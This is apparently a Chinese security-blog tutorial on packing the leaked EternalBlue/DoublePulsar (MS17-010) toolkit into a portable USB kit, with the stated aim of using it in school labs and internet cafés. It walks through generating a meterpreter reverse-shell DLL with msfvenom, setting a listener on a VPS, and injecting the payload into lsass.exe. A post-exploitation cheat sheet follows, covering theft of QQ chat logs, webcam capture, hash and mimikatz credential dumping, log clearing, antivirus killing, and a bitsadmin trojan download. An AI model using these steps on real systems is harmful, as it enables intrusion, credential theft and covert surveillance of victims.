本文首發Freebuf,屬原創獎勵計划,未經許可禁止轉載。
鏈接:http://www.freebuf.com/articles/system/132274.html
一. 前言
前段時間Shadow Broker披露了 Windows大量漏洞,甚至爆出黑客組織 Equation Group 對於Windows 遠程漏洞 MS17-010 的利用工具,該漏洞影響范圍之廣,堪稱殺器。可以看看官方通告https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx
於是想着把攻擊環境移植到u盤里,然后比如去學校機房,網吧。。。。。。
這里分享一下個人的移植過程,以及在使用攻擊代碼過程中遇到的問題。
二. 環境移植過程
思路就是利用現成的神器pentestbox,向里添加攻擊代碼以及其運行需要的pytho環境
Pentest Box是一款Windows平台下預配置的便攜式開源滲透測試環境,集成了各種編譯運行環境,具體的可以到網上了解一下。
1. 工具准備:
Pentestbox:
方程式工具包:
EQGRP_Lost_in_Translation
https://github.com/x0rz/EQGRP_Lost_in_Translation/tree/master
python環境
必須在Python2.6 和 pywin32-221環境下,如果你用其他環境,會報各種諸如模塊/dll缺失等錯誤
Python2.6 和 pywin32-221位數需要相同,我用的是32位的
Python2.6.6 (32)
下載鏈接:https://www.python.org/download/releases/2.6.6/
pywin32-221(32)
下載鏈接:
2. Pentestbox下python2.6環境配置
分別安裝,然后你會得到攻擊包運行的python2.6環境
在Python26\Lib\site-packages目錄下,你會發現插件也已經安裝
然后把python26這個文件夾拷貝到你的pentestbox環境變量目錄下:Pentestbox\base
剛才你也可以直接裝到pentestbox\base下
然后我們添加python2.6環境變量,在Pentestbox \config\alias文件中加一行
python26="%pentestbox_ROOT%\base\Python26\python.exe" $*
然后我們啟動pentestbox,由於pentestbox通過線程注入掛鈎cmd.exe來調用系統命令,因此殺軟可能會提示警告,信任即可。
這個時候,我們運行python26可以看到環境配置成功
3. 漏洞利用工具配置
我們下載EQGRP_Lost_in_Translation工具包,修改windows目錄下fb.py,去除不必要的代碼
然后我們把windows文件夾復制到pentestbox目錄下
這里我把windows里的文件放到pentestbox根目錄下的ms17-010文件夾內
我們進入ms07-010目錄並執行python26 fb.py
這樣我們就可以啟動攻擊程序了
三. 攻擊示例
攻擊機:192.168.1.106
靶機: 192.168.1.111 windows x64 SP1
我們先用msf生成dll木馬,用於控制目標
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxxx LPORT=9999 -f dll > 9999-64.dll
Pentestbox里自帶的metasploit框架我在使用總是時出現問題,我一般不用它,我通常是在自己的vps服務器進行監聽
本地測試時候可以找一台kali攻擊機
dll木馬我們可以提前生成好放在u盤里帶着,隨時備用*_*
接下來我們用Msf進行監聽
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST IP (這里填寫vps的內網ip,記得開放監聽端口)
set LPORT 9999
set stagerverifysslcert false
exploit -j
如果沒有設置set stagerverifysslcert false,獲取shell的時候可能會出現這樣的情況
回到fb.py中,開始攻擊
[?] Default Target IP Address [] : 攻擊目標
[?] Default Callback IP Address [] : 本機ip
[?] Use Redirection [yes] : no 是否重定向
[?] Base Log directory [D:\logs] : 是否輸出日志
然后創建一個項目實例
如果你之前創建過實例,可以選擇它,改設置,也可以重新創建一個
輸入命令 use 可以查看我們利用的exp模塊
我們使用EternalBlue模塊,use EternalBlue
下面一直回車就行。。。
選擇攻擊目標的系統
這里會詢問你payload傳輸方式 選擇1,感覺更穩定些
繼續回車,確認信息
成功之后,我們使用doublepulsar模塊
繼續一路回車
選擇協議
選擇目標系統
選擇攻擊方式,我們利用dll木馬
設置dll木馬路徑,我已經提前生成好放在u盤里隨身攜帶,隨時備用~
然后設置要注入的程序,默認是lsass.exe
這里注入的進程會對目標造成影響,也試了幾個其他程序,比如注explorer時候,會彈出一個報錯框
注入其他進程,有時候或多或少都會出那么點問題
然后是一路回車
最后一步執行攻擊
Msf這里成功獲取shell
截個屏看看
一個正在成長中的團隊,歡迎交流,分享,合作~
四. 后滲透輔助命令
配合下面的一些命令,happy to play~
meterpreter
upload /root/nc.exe c:\\windows\\system32 #上傳文件
search –d c:\\windows –f *.mdb #在目標主機Windows目錄中搜索文件s
執行程序
execute -H -i -f cmd.exe #隱藏執行cmd並與之交互
execute -H -m -d calc.exe -f wce.exe -a “-o foo.txt” #隱藏執行,並顯示虛假運行程序
我們可以用遠控生成一個木馬傳過去
例:下載目標聊天記錄到本地/tmp目錄下,可用Qqlogger查看
download c:\\Programs Files\\Tecent\\QQ\\Users\\qq號\\Msg2.0.db /tmp
run webcam -p 圖片保存路徑 #開啟目標攝像頭並截圖
run packetrecorder –i 會話序號 #捕獲流量數據包.pcap
提權
use privs
getsystem
getuid
clearev --清除日志
run killav --干掉殺軟
文件關聯
改變文件類型關聯DLL到 txt文件類型: assoc .dll=txtfile
改變文件類型關聯EXE 到png文件類型: assoc .exe=pngfile
改變文件類型關聯MP3到jpg文件類型: assoc .mp3=jpgfile
Hash獲取
hashdump或run hashdump或run smart_hashdump
>run post/windows/gather/hashdump
>run /windows/gather/smart_hashdump --可繞過windows UAC控制
用kiwi獲取明文密碼:
meterpreter>load kiwi
meterpreter> creds_all
Metaspolit中使用Mimikatz:
使用metasploit內建的命令:
meterpreter > load mimikatz
meterpreter > msv #msv creden
meterpreter > kerberostials #kerberos credentials
使用mimikatz自帶的命令:
meterpreter > mimikatz_command -f samdump::hashes
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
<前面一句命令在密碼超過14位時LM會為空,后一句命令可以得到明文>
利用windows命令下載文件
bitsadmin /transfer mydownJob /download /priority normal “http://url/muma.exe" "F:\muma.exe "
詳細用法可參考:https://technet.microsoft.com/zh-cn/library/cc753856(v=ws.10).aspx
最后:
今天下午有人在i春秋發布了批量利用程序
https://bbs.ichunqiu.com/thread-21863-1-1.html~